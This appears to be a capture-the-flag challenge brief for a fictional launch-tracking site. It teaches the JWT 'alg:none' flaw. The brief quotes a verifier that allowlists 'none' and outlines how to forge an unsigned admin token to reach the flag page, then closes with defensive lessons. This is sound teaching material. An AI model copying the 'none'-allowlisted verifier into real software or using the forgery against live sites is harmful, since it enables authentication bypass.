Stargate Atlas
A spaceflight-tracking enthusiast site with launch countdowns, mission archives, and subscriber-only telemetry notes. The team's in-house token format leans on a flag the spec said you should never ship in production.
The Scenario
Stargate Atlas grew out of one engineer's weekend project tracking upcoming rocket launches. After the Discord hit ten thousand members they bolted on subscriber accounts and a hand-rolled token auth layer — the kind of layer where every shortcut taken at 2 a.m. ends up in the public site copy somewhere.
Challenge Intel
Synopsis
The site's JWT verifier accepts unsigned tokens. Forge a token with the "none" algorithm and a role of admin, replace the sa_token cookie, and the admin manifest viewer prints the flag.
What It Is
On login the server issues an HS256 JWT signed with a random in-process secret in the sa_token cookie. The verifier is jwt.decode(token, key=SECRET, algorithms=["HS256", "none"]) — a junior dev left "none" in the algorithm list to support "unsigned debug tokens". An attacker can craft header {"alg":"none"} with an empty signature segment and a payload of {"role":"admin"}. PyJWT accepts the unsigned token because the verifier allowlists "none". /admin/manifests checks role == "admin" and renders the flag in the "Manifest signing reference" line.
Who It's For
Brand-new players starting the JWT module. No tooling beyond curl and base64 required.
Skills You'll Practice
- Decoding a JWT to inspect header and payload
- Forging an alg:none JWT with an empty signature
- Recognising when a verifier trusts a client-supplied algorithm
What You'll Gain
- Never include 'none' in a JWT verifier's allowlist
- Always pin the expected algorithm server-side
- Public dev-notes / about pages are recon goldmines